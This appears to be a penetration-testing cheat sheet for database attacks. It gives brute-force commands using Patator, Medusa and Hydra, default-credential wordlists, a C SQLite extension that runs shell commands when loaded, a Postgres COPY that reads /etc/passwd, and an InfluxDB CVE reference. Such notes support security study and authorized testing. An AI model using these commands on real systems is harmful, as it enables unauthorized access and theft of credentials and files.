HackSheet


Bruteforce

Patator

patator pgsql_login user=user password=FILE1 0=/usr/share/wordlists/rockyou.txt  host=ip -x ignore:fgrep='failed'

Medusa

medusa -h ip -u user -P pass.txt -M mysql -n 22

Hydra

hydra -l user -P pass.txt ip mysql

MySql

Port: 3306

Connect to mysql

mysql -h localhost -u myname -p

Show Info

SHOW DATABASES;
use db_name
SHOW TABLES;

Select

SELECT * FROM table_name

SQLite

Open

sqlite3 database.sqlite3

or open in vs code

Show info

.databases
.tables

Load extension

Sometimes you have to load extension to get some privileges Note: the function name need to be sqlite3_<extension_name>_init

// gcc -s -g -fPIC -shared my_extension.c -o my_extension.so
#include <stdlib.h>
int sqlite3_my_extension_init(){
    system("id");
    return 0;
}

After that you can load the extension on sqlite with:

load_extension("my_extension.so");

Postgres

Port: 5432

Wordlist Default Credentials

/usr/share/metasploit-framework/data/wordlists/postgres_default_user.txt
/usr/share/metasploit-framework/data/wordlists/postgres_default_pass.txt

Connect

psql -h ip -U username -d database -W

Show infos

\l # list all databases
\dt # list all tables

Read File

create table hack(file TEXT);
COPY hack FROM '/etc/passwd';
select * from hack;

Influx DB

CVE-2019-20933 Influxdb

> show databases # to display databases
> show field keys # field keys (like columns in sql)
> show measurements # to display measurements (like tables in sql)
{
  ...
  "results": [
    "values": [
        [
            <strong>"foo"</strong>
        ]
    ]
  ...
}
> select * from "foo" # display all content of measurments (table) 'foo' (keep the doubles quotes)

Dynamodb

See this page